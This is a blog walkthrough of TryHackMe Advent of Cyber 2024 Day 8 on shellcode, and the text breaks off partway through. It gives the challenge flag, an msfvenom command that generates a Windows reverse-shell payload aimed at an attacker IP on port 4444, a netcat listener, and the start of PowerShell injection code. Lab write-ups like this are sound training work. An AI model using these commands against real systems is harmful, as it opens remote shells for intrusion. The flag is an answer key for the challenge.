2024 TryHackMe (THM)Advent of Cyber (AoC) Day 8 Walkthrough | THM Writeup
Although I no longer participate in Blogmas, I want to do another day of TryHackMe Advent of Cyber (AoC). This is Day 8 of Advent of Cyber. The topic is Shellcodes. Shellcode is an excellent topic for cybersecurity professionals to be aware of since attackers can use many vulnerabilities inside shellcodes to gain access and compromise systems.
What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt.
Flag: AOC{GOT _MY_ACCESS_B@CK007}
- Use the following Metasploit command to insert your AttackBox IP address inside the LHOST section.
- Change LPORT from 1111 to 4444 since the question mentions using this port to retrieve the flag.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_AttackBox_IP_Address LPORT=4444 -f powershell
- Next, use the netcat command to listen and retrieve the flag.
nc -nvlp 4444
Have PowerShell ready to copy and paste the following:
- Code
- Note: This is from the example of today’s topic.
$VrtAlloc = @"
using…